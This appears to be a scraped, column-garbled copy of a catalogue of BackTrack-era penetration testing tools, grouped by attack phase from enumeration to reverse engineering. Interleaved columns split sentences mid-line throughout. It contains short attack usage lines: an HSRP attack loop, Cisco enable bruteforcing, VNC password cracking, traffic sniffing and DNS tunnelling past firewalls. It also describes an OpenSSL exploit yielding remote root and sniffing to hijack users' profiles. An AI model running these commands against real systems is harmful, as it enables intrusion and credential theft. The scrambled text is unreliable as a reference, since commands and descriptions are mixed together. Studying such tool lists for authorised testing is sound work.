Академический Документы
Профессиональный Документы
Культура Документы
Enumeration
name is the domain name that is to be looked up. It can also be a dotted-
decimal IPv4 address or a colon-delimited IPv6 address, in which case host
will by default perform a reverse lookup for that address. server is an
optional argument which is either the name or IP address of the name server
that host should query instead of the server or servers listed in host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] [-4] [-6] [
1.1.15 Host /etc/resolv.conf. -s ] {name} [server]
The security benefit here is the attack is under the disguise of the
ICMP protocol which is generally considered safe. A lot of network
administrators keep ICMP available for troubleshooting purposes and
it's barely ever turned off. IP packets sent through a firewall with a Can use version IPv4 or IPv6 for tracerouting. By default, the program will try to
spoofed address of a known trust would be able to traverse the resolve the name given, and choose the appropriate protcol automatically. If
itrace is a traceroute program that traces through networks to find network network using just the ICMP protocol thus rendering the firewall resolving a hostname returns both IPv4 and IPv6 addresses, traceroute will use
1.1.16 Itrace paths using ICMP Echo Request Packets instead of ICMP useless in network mapping and enummeration attempts. IPv4.
./netenum 10.1.2.3/25
netenum can be used to produce lists of hosts for other programs. It's not as This script produces a list of IP addresses in a given range. It can HSRP attack:
powerful as other ping-sweep tools, but it's simple. When giving a timeout, it take the network range as a single IP, a an IP and Netmask, and an IP for I in 'netenum 192.168.20.11/23'
uses ICMP echo request to find available hosts. If you don't supply a with CIDR notation. It also takes hostnames. This can be used to do
timeout, it just prints an IP address per line, so you can use them in shell quickly produce lists of IP addresses for a specified range, and to be ./hsrp -d ${i} -v172.16.0.11 -a cisco -g 1 -I eth0
1.1.17 Netenum scripts. used in scripts. done
This is valuable for interpreting CIDR notation because it allows you to
visually see the mask that gets applied to the IP address to compute
the routing. I'll be using this program to buff up on my CIDR notation ./netmask -d destination
1.1.18 Netmask Netmask simply displays all the values of a netmask based on the input. for sure. ./netmask -d 192.168.2.4/16
1.1.19 Pirana
Network Mapping
In the default mode, if a target replies, it is noted and removed from the list
of targets to check; if a target does not respond within a certain time limit
and/or retry limit it is designated as unreachable. fping also supports sending
a specified number of pings to a target, or looping indefinitely (as in ping ).
Its always a good idea to have a program that allows for multiple
Unlike ping , fping is meant to be used in scripts, so its output is designed to inputs and easy output for parsing. Fping works just like regular ping
1.2.4 Fping be easy to parse. only it can be used in scripts and loops. Good shit. fping 192.168.2.4 192.168.2.5 192.168.4.66
Vulnerability Identification
GUI based tool designed to automate the process of blind SQL injection. It
works by profiling response pages as true or false from known cases, then GUI application --- see documentation or:
1.3.1 Absinthe moves on to identify unknowns as true or false. Logical blind SQL inject attacks http://www.0x90.org/releases/absinthe/docs/basicusage.php
Bruteforce Exploit Detector (BED) is a suite of scripts that automatically tests
implementations of different protocols for buffer-overflows and format string
vulnerabilities, but bombarding the server with random strings of varying Basically a remote exploit fuzzer with no real logic behind it's "user"
1.3.2 Bed length. supplied data.
1.3.3 CIRT Fuzzer TCP/UDP Fuzzer
Useful for password guessing, bruteforcing, dictionary attacks,
scanning multiple hosts, IOS devices. Even has a quiet mode
1.3.4 Cisco Auditing Tool Auditor for cisco network devices (IOS devices) attribute.
1.3.5 Cisco Enable Bruteforcer Bruteforce tool that attempts unbridaled access to an IOS device Bruteforce Attack Tool for Cisco Devices enabler <ip> [-u user] <pass> <passlist> [port]
Mibble is an open-source SNMP MIB parser (or SMI parser) written in Java.
1.3.27 Mibble MIB Browser It can be used to read SNMP MIB files as well as simple ASN.1 files.
Mistress in an 'Application Sadism Environment' and can also be called a
fuzzer. It is written in Python and was created for probing file formats on the
fly and protocols with malformed data, based on pre-defined patterns. It is
recommended that the project site be visited for further documentation and
1.3.28 Mistress use cases.
Nikto is an Open Source (GPL) web server scanner which performs
1.3.29 Nikto comprehensive tests against web servers for multiple items
OAT (Oracle Auditing Tools) - is a set of tools which can be used to audit
1.3.30 OAT Oracle databases running on the Microsoft Windows platform.
1.3.31 Onesixtyone SNMP Scanner
Tested against most major Linux distributions. Gives a remote nobody
shell on Apache and remote root on other servers. Includes an
OpenSSL vulnerability scanner scans for a remote exploit for the KEY_ARG OpenSSL vulnerability scanner and a detailed vulnerability analysis.
1.3.32 OpenSSL-Scanner overflow in OpenSSL 0.9.6d and older Only Linux/x86 targets are supported.
1.3.33 Paros Proxy Java developed web proxy
see documentation or
1.3.34 Peach Python based cross-platform application fuzzer very versitile fuzzer http://peachfuzz.sourceforge.net/docs/tutorial/peach-tutorial.htm
RPCDUMP is a program which provides console access to the RPC APIs in
1.3.35 RPCDump Windows.
• vhh : We use search engine that return host that are on an IP (Virtual
Host hacking)
• Findsubdomains : module that returns subdomains of a domains.
• Dnsbruteforce : dnsbruteforce is now a module of revhosts. It use
multithread (1 thread for each dns server) and made dns resolution of
hostnames of a domain.
• Getdirectories : look on search engine for directories that are on a
host (no connection to the host).
• subnet : look for IP that have the same tech contact.
• getmail : module that search on internet for mail adress see documentation or:
1.3.36 RevHosts Python based tool to accelerate Passive Information Gathering http://www.revhosts.net
A SMB bruteforcer which tries approx. 1200 logins/sec on Windows 2000
1.3.37 SMB Bruteforcer because of the timeout bug. Useful for legacy machine penetration attempts
A LanManager-like simple client for Unix The Samba software suite is a
collection of programs that implements the SMB protocol for unix systems,
allowing you to serve files and printers to Windows, NT, OS/2 and DOS Absolutely necessary when testing or infiltrating a primarily windows
1.3.38 SMB Client clients. based network
Absolutely necessary when testing or infiltrating a primarily windows
1.3.39 SMB Serverscan Scans for machines running Samba servers. based network
Netbios Auditing Tool This tool can perform various security checks on
remote servers running NetBIOS file sharing services. It is capable of
enumerating shares and make break-in attempts using a (user-provided) list Absolutely necessary when testing or infiltrating a primarily windows
1.3.40 SMB-NAT of users and passwords. based network
Absolutely necessary when testing or infiltrating a primarily windows
1.3.41 SMBdumpusers Netbios Auditing Tool to dump users of remote windows hosts based network
Netbios Auditing Tool to retrieve serverside information about a windows Absolutely necessary when testing or infiltrating a primarily windows
1.3.42 SMBgetserverinfo host based network
SQLBrute is a tool for brute forcing data out of databases using blind SQL
injection vulnerabilities. It supports time based and error based exploit types
1.3.48 SQLbrute on Microsoft SQL Server, and error based exploit on Oracle. Very loud and will easily get identified by most IDS systems
Smb4K is a SMB/CIFS share browser for KDE. It uses the Samba software
1.3.50 Smb4K suite to access the SMB/CIFS shares of the local network neighborhood.
1.3.52 Snmp Enum Perl written script to enumerate information on machines running SNMP
1.3.53 Spike Linux based network protocol analysis tool. see http://www.immunitysec.com/resources-freesoftware.shtml
Powerful TCP port scanner, pinger, resolver. SuperScan is a powerful Multithreaded and asynchronous techniques make this program
1.3.55 SuperScan connect-based TCP port scanner, pinger and hostname resolver. extremely fast and versatile.
. It performs "black-box" scans, i.e. it does not study the source code
of the application but will scans the webpages of the deployed
webapp, looking for scripts and forms where it can inject data. Once it
gets this list, Wapiti acts like a fuzzer, injecting payloads to see if a
1.3.59 Wapiti Wapiti allows you to audit the security of your web applications. script is vulnerable.
Penetration
Metasploit framework is an open-source platform for developing, testing and
Framework3-MsfC using exploit code Don’t leave home without it
1.4.2 Framework3-MsfUpdate Metasploit utility to update Metasploit using SVN
1.4.3 Framework3-Msfcli Metasploit command line interface Quickest interface to use
1.4.4 Framework3-Msfweb Metasploit interactive webserver and interface
Cycles through every potentail metasploit exploit in attempts to
1.4.5 Init Pgsql (autopwn) Metasploit autopown engine successfully compromise the host
1.4.6 Milw0rm Archive An archive of exploitable code from Milw0rm.com useful for obtaining PoC code http://www.milw0rm.com
1.4.7 MsfCli Metasploit command line interface
The msfconsole interactive command-line interface provides a command set
that allows the user to manipulate the framework environment, set exploit
options, and ultimately deploy the exploit. Unrecognized commands are
passed to the underlying operating system; in this way, a user can run
1.4.8 MsfConsole reconnaissance tools without having to leave the console
1.4.9 MsfUpdate Uses SVN to update Metasploit code and exploits.
openssl-too-open is a remote exploit for the KEY_ARG overflow in OpenSSL
0.9.6d and older. Tested against most major Linux distributions. Gives a
remote nobody shell on Apache and remote root on other servers. Includes
an OpenSSL vulnerability scanner and a detailed vulnerability analysis. Only
1.4.11 OpenSSL-To-Open Linux/x86 targets are supported.
Privilege Escalation
Driftnet is a program which listens to network traffic and picks out images useful for sniffing out image files of other users on the network, can
1.5.7 Driftnet from TCP streams it observes. also be used to hijack social networking pages/profiles
It currently has modules for the following services: CVS, FTP, HTTP,
IMAP, MS-SQL, MySQL, NCP (NetWare), PcAnywhere, POP3,
Medusa is a speedy, massively parallel, modular, login brute-forcer for PostgreSQL, rexec, rlogin, rsh, SMB, SMTP (VRFY), SNMP, SSHv2,
1.5.25 Medusa network services, created by the geeks at Foofus.net SVN, Telnet, VmAuthd, VNC, and a generic wrapper module.
Passively monitors a network for interesting data being sent across the
1.5.26 Msgsnarf network. Msgsnarf shall capture messages on a network/interface.
. It's handy for when you just want to sit down and specify exactly what
packets you want to craft. It supports crafting ARP, DNS, Ethernet,
Nemesis is a packet-crafting program that can forge raw packets up from the ICP, IGMP, IP, RIP, TCP, and UDP packets. Similar in concept to the
1.5.27 Nemesis Spoofer Ethernet layer up and put them on the wire "hping" program.
1.5.28 NetSed
1.5.29 Netenum
1.5.30 Netmask
Tcpick is able to save the captured flows in different files or displays tcpick -I eth0 "port 80" -wRub
them in the terminal, and so it is useful to sniff files that are transmitted log http data in unique files (client and server mixed together)
via ftp or http. It can display all the stream on the terminal, when the
connection is closed in different display modes like hexdump, tcpick -I eth0 -C -bCU -T1 "port 25"
1.5.40 TcPick A TCP stream sniffer and connection tracker hexdump + ascii, only printable charachters, raw mode and so on display client data only of the first smtp connection
1.5.41 URLsnarf
vncrack -h target.host.com -w wordlist.txt [options]
to crack an online host
Brute force the hell out of a server. Additional, you may pass a
An extremely loud brute force tool to be used on servers or password files Registry key with the encrypted password or the UNIX password file to vncrack 0C /home/some/user/.vnc/passwd
1.5.42 VNCrack (passwd) VNCrack and it does this simple fixed key decryption for you. to crack a password file offline
1.5.43 WebCrack
Best free graphical traffic analyzer there is. Don’t leave home without see documentation or
1.5.44 Wireshark GUI based network traffic analyzer it. www.wireshark.org
Wireshark with Wifi Injection Patch allows the user to select a packet opened
1.5.45 Wireshark Wifi with wireshark and edit it and reinject throught LORCON injection library.
wyd is a password profiling tool that extracts words/strings from supplied It supports different filetypes: plain, html, php (partially), doc, ppt, mp3,
1.5.46 WyD files and directories pdf, jpeg, odp/ods/odp and extracting raw strings.
Maintaining Access
1.6.2 Backdoors
Cryptcat is the standard netcat enhanced with twofish encryption with ports
for WIndows NT, BSD and Linux. Twofish is courtesy of counterpane, and
1.6.3 CryptCat cryptix. Netcat with encryption functionality built in.
1.6.4 HttpTunnel Client
1.6.5 HttpTunnel Server
1.6.6 ICMPTX
This is a piece of software that lets you tunnel IPv4 data through a DNS Useful in situations where internet access is firewalled and therefore
1.6.7 Iodine server. limited, but DNS queries are allowed (as usual). iodine [-v] [-h][-f][-u user] [-t chrootdir] [-d device] [nameserver] topdomain
Privoxy is a web proxy with advanced filtering capabilities for protecting Privoxy has a very flexible configuration and can be customized to suit
privacy, modifying web page data, managing cookies, controlling access, individual needs and tastes. Privoxy has application for both stand-
1.6.9 Privoxy and removing ads, banners, pop-ups and other obnoxious Internet junk alone systems and multi-user networks.
that connects stdin and stdout to a server somewhere on the network, Use can include tunnelling SSH sessions through HTTP(S) proxies,
1.6.10 ProxyTunnel through a standard HTTPS proxy. allowing activity that would otherwise be restricted
1.6.11 Rinetd
Each of these data channels may be a file, pipe, device (serial line etc.
or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an
SSL socket, proxy CONNECT connection, a file descriptor (stdin etc.),
the GNU line editor (readline), a program, or a combination of two of
socat is a relay for bidirectional data transfer between two independent data these. These modes include generation of "listening" sockets, named
1.6.14 socat channels. pipes, and pseudo terminals.
Covering Tracks
1.7.1 Housekeeping
Kismet will work with any wireless card which supports raw monitoring
(rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.
Kismet identifies networks by passively collecting packets and
detecting standard named networks, detecting (and given time,
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion decloaking) hidden networks, and infering the presence of
1.8.1.19 Kismet detection system. nonbeaconing networks via data traffic.
1.8.1.20 Load IPW3945
1.8.1.21 Load acx100
1.8.1.22 MDK2
1.8.1.23 MDK2 for Broadcom
A GNU/Linux utility for viewing/manipulating the MAC address of network
1.8.1.24 MacChanger interfaces
1.8.1.25 Unload Drivers
1.8.1.26 Wep_crack
1.8.1.27 Wep_decrypt
Wifitap allows direct communication with an associated station to a
Wifitap is a proof of concept for communication over WLAN networks using given access point directly, whilst not being being associated
1.8.1.28 WifiTap traffic injection ourselves or being handled by access point.
Digital Forensics
The Sleuth Kit (TSK) is a collection of UNIX-based command line tools that The current focus of the tools is the file and volume systems and TSK
1.10.12 Sleuthkit allow you to investigate a computer. supports FAT, Ext2/3, NTFS, UFS, and ISO 9660 file systems.
1.10.13 Vinetto Vinetto is a forensics tool to examine Thumbs.db files
Reverse Engineering
Console debugger to step through instructions and locate breakpoints in
1.11.1 GDB Console GUI executables Standard nix console debugger. Don’t leave home without it
1.11.2 GDB GNU Debugger GUI Debugger, works the same as GDB Don’t leave home without it
gdbserver is a control program for Unix-like systems, which allows you to
connect your program with a remote GDB via target remote---but without
1.11.3 GDB Server linking in the usual debugging stub.
. Besides ``usual front-end features such as viewing source texts,
DDD has become famous through its interactive graphical data
1.11.4 GNU DDD GNU DDD is a graphical front-end for command-line debuggers display, where data structures are displayed as graphs.
Hexdmup is a simple program for dumping binary files in hexadecimal
1.11.5 Hexdump format. It provides both hexadecimal and ascii columns.
View and edit files in hexadecimal or in ASCII. The file can be a device as
the file is read a piece at a time. You can modify the file and search through
1.11.6 Hexedit it.
1.11.7 OllyDBG 32-bit Disassembler for Win32 platforms Don’t leave home without it